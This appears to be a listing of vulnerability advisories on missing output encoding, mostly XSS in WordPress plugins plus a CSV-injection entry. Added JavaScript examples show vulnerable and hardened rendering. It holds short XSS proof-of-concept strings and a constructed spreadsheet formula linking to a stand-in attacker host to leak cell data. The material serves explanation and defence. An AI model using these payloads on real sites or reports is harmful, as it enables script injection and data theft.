CVE-2021-24128
WordPress Team Members plugin vulnerability CVE-2021-24128 affects versions before 5.0.4. The issue is unvalidated input and lack of output encoding in the Description/biography field, enabling an authenticated, medium-privileged attacker (contributor+) to inject arbitrary web script or HTML (sto...
CVE-2021-24128 Team Members < 5.0.4 - Authenticated Stored Cross-Site Scripting (XSS)
Unvalidated input and lack of output encoding in the Team Members WordPress plugin, versions before 5.0.4, lead to stored Cross-Site Scripting (XSS) vulnerabilities allowing a medium-privileged authenticated attacker (Contributor+) to inject arbitrary web script or HTML via the 'Description/biography' of a member...
CVE-2021-24124
Affected software: WordPress WP Shieldon plugin (versions 1.6.3 and below). Vulnerability: Unauthenticated Reflected Cross‑Site Scripting caused by unvalidated input and lack of output encoding on the CAPTCHA page, due to $_SERVER['REQUEST_URI'] being echoed without encoding. Impact: could lead t...
CVE-2021-24129 Themify Portfolio Post < 1.1.6 - Authenticated Stored Cross-Site Scripting
Unvalidated input and lack of output encoding in the Themify Portfolio Post WordPress plugin, versions before 1.1.6, lead to Stored Cross-Site Scripting (XSS) vulnerabilities allowing low-privileged users (Contributor+) to inject arbitrary JavaScript code or HTML in posts where the Themify Custom Pan...
CVE-2021-24126
The CVE-2021-24126 entry concerns the Envira Gallery Lite WordPress plugin (versions before 1.8.3.3). The issue arises from unvalidated input and a lack of output encoding when sanitising image metadata (specifically the title) before it is rendered in the generated gallery. This handling is desc...
CVE-2021-24124 WP Shieldon 1.6.3 - Unauthenticated Cross-Site Scripting (XSS)
Unvalidated input and lack of output encoding in the WP Shieldon WordPress plugin, version 1.6.3 and below, lead to Unauthenticated Reflected Cross-Site Scripting (XSS) when the CAPTCHA page is shown, which could lead to privilege escalation...
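The two WP Shieldon entries above describe the same root cause: the raw request URI is written into the CAPTCHA page without encoding, so anything the attacker places in the path becomes markup. The following is an added example, not WP Shieldon's code (the plugin is PHP; this reproduces the pattern in JavaScript so it can be run offline). It assumes the page template receives the already-decoded request path, and all names (`escapeHtml`, `renderVulnerable`, `renderHardened`, `isAttributeBreakout`, `attackerUri`) are this example's own:

```javascript
// Added example, not taken from any advisory or plugin on this page.
// Shows the "request URI echoed without encoding" bug and its fix.

// Minimal HTML encoder covering the characters that matter in text and
// double-quoted attribute contexts (the OWASP minimal entity set).
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Vulnerable pattern: the request path is concatenated straight into the
// template, both inside an attribute and as text. A path containing a
// double quote terminates the attribute early and the rest is parsed as
// new attributes (for example an onerror handler).
function renderVulnerable(requestUri) {
  return '<form method="post" action="' + requestUri + '">' +
         '<p>Enter the CAPTCHA to continue to ' + requestUri + '</p></form>';
}

// Hardened: encode at the output boundary, once, for the context the value
// lands in. For the action attribute a real plugin should additionally
// validate that the value is a relative URL; encoding alone is shown here.
function renderHardened(requestUri) {
  const safe = escapeHtml(requestUri);
  return '<form method="post" action="' + safe + '">' +
         '<p>Enter the CAPTCHA to continue to ' + safe + '</p></form>';
}

// Crude check for the demonstration: a double quote followed by an event
// handler attribute, or a script tag, appearing in the rendered page. After
// encoding the quote becomes &quot; and the tag becomes &lt;script, so the
// same attacker input no longer matches.
function isAttributeBreakout(html) {
  return /"\s*on\w+\s*=|<script/i.test(html);
}

// Constructed attacker input: a URI path carrying an attribute breakout,
// the same technique as the URI-path report further down this listing.
const attackerUri = '/captcha/A"onerror=\'alert(1)\'x/';

// Constructed second input for the text context.
const attackerUriScript = '/captcha/<script>alert(2)</script>';
```

The check function is only there to make the difference observable in a test; in a real review you would load both renderings in a browser or an HTML parser rather than trusting a regular expression.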
WordPress Constant Contact Forms Cross-Site Scripting Vulnerability
WordPress Constant Contact Forms is an open source WordPress plugin. It allows websites to capture visitor information directly and easily. A cross-site scripting vulnerability exists in versions of the Constant Contact Forms WordPress plugin prior to 1.8.8. The vulnerability stems fr...
WordPress WP Customer Reviews Cross-Site Scripting Vulnerability
WordPress WP Customer Reviews is an open source WordPress plugin. A cross-site scripting vulnerability exists in WP Customer Reviews WordPress plugin versions prior to 3.4.3. The vulnerability stems from the program not properly validating input and not encoding output. An attacker...
WordPress Themify Portfolio Post Cross-Site Scripting Vulnerability
WordPress Themify Portfolio Post is an open source WordPress plugin. It provides a neat layout for displaying project information. A cross-site scripting vulnerability exists in Themify Portfolio Post WordPress plugin versions prior to 1.1.6. The vulnerability stems from the progra...
WordPress Team Members Cross-Site Scripting Vulnerability
WordPress Team Members is an open source WordPress plugin. It adds a team-management feature to the administration panel. A cross-site scripting vulnerability exists in the Team Members WordPress plugin versions prior to 5.0.4. The vulnerability stems from the program not properly...
A vulnerability in several functions of the PHPMailer class in the PHPMailer library allows an attacker to compromise data integrity.
The vulnerability in several functions of the PHPMailer class library is caused by the lack of encoding or escaping of output data. Exploiting this vulnerability allows a remote attacker to compromise the integrity of data...
Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)
Unvalidated input and lack of output encoding within the plugin lead to a Reflected Cross-Site Scripting (XSS) vulnerability in the 'lang' GET parameter while editing a post, triggered when a user with the capability to edit posts opens a malicious URL. PoC: /wp-admin/post.php?post=1&action=edit&lang='...
CVE-2020-29023
Improper Encoding or Escaping of Output from CSV Report Generator of Secomea GateManager allows an authenticated administrator to generate a CSV file that may run arbitrary commands on a victim's computer when opened in a spreadsheet program like Excel. This issue affects: Secomea GateManager all...
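The Secomea entry above is the CSV flavour of the same weakness: a cell that begins with a formula trigger is evaluated, not displayed, when the export is opened in a spreadsheet. The following is an added example, not Secomea's code, showing a report generator that passes user-controlled cells through unchanged next to one that quotes every field and neutralises formula triggers. The trigger set, the numeric-text exception and all names (`neutraliseCell`, `quoteCsvField`, `toCsvVulnerable`, `toCsvHardened`, `constructedRows`) are this example's own:

```javascript
// Added example, not taken from any advisory or product on this page.
// Spreadsheet formula injection ("CSV injection") and one hardening approach.

// Leading characters that Excel and LibreOffice treat as the start of a
// formula or that can smuggle a formula past the CSV parser.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

// Plain numeric text such as "-5" or "+3.2" is not a formula; leaving it
// alone keeps negative numbers usable in the report.
const NUMERIC_TEXT = /^[+-]?\d+(\.\d+)?([eE][+-]?\d+)?$/;

// RFC 4180 quoting: wrap in double quotes and double any embedded quote.
// Quoting alone does NOT stop formula evaluation; that is what
// neutraliseCell is for.
function quoteCsvField(text) {
  return '"' + String(text).replace(/"/g, '""') + '"';
}

// Prefix a formula-looking cell with a single quote so the spreadsheet
// treats it as text. Real numbers are passed through as numbers.
function neutraliseCell(value) {
  if (typeof value === 'number') return String(value);
  const s = String(value);
  if (s.length === 0 || !FORMULA_TRIGGERS.has(s[0])) return s;
  if (NUMERIC_TEXT.test(s)) return s;
  return "'" + s;
}

// Vulnerable generator: cells are joined as-is, so a cell supplied by an
// attacker as "=HYPERLINK(...)" or "=cmd|..." reaches the spreadsheet intact.
function toCsvVulnerable(rows) {
  return rows.map((row) => row.join(',')).join('\r\n');
}

// Hardened generator: every cell is neutralised, then quoted.
function toCsvHardened(rows) {
  return rows
    .map((row) => row.map((cell) => quoteCsvField(neutraliseCell(cell))).join(','))
    .join('\r\n');
}

// Constructed sample report rows, including one attacker-controlled cell.
const constructedRows = [
  ['user', 'comment', 'balance'],
  ['alice', 'looks fine', 12],
  ['mallory', '=HYPERLINK("http://attacker.invalid/?"&A2,"click")', -5],
];

// Returns true when any data cell of a vulnerable-style export still starts
// with a formula trigger; used to make the difference checkable.
function hasLiveFormula(csv) {
  return csv.split('\r\n').some((line) =>
    line.split(',').some((cell) => cell.length > 0 && FORMULA_TRIGGERS.has(cell[0])));
}
```

The single-quote prefix is visible in some spreadsheet programs, which is the usual trade-off; the alternative is to reject such values at input time, but output-side neutralisation is the control that matches the CWE listed here because it works regardless of how the data entered the system.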
U.S. Dept Of Defense: RXSS Via URI Path - https://██████████/
Hello all, I found RXSS in your own website. Steps to reproduce: go to this link https://██████/Orders/A%22onerror='alert%60xElkomy%60'testabcd/Login.aspx?ReturnUrl=/Orders. Browsers: I tested them on Firefox and Google Chrome. Fix: filter input on arrival; encode data on output; use appropriate response...
GHSA-P9VV-3945-X93H Cross-Site Scripting in semantic-ui-search
All versions of semantic-ui-search are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text. Recommendation No fix is currently available. Consider using an alternative module until a fix is made...
Cross-Site Scripting in mermaid
Versions of mermaid prior to 8.2.3 are vulnerable to Cross-Site Scripting. If malicious input such as A"" is provided to the application, it will execute the code instead of rendering it as text due to improper output encoding. Recommendation Upgrade to version 8.2.3 or later...
A vulnerability in the security mechanism for executing macros in the LibreOffice office software package allows an attacker to gain unauthorized access to confidential data, cause service failures, or compromise data integrity.
The vulnerability in the security mechanism for executing macros in the LibreOffice office software package is caused by the lack of encoding or escaping of output data. Exploiting this vulnerability can allow a remote attacker to gain unauthorized access to...
CVE-2020-14055
Monsta FTP 2.10.1 or below is prone to a stored cross-site scripting vulnerability in the language setting due to insufficient output encoding...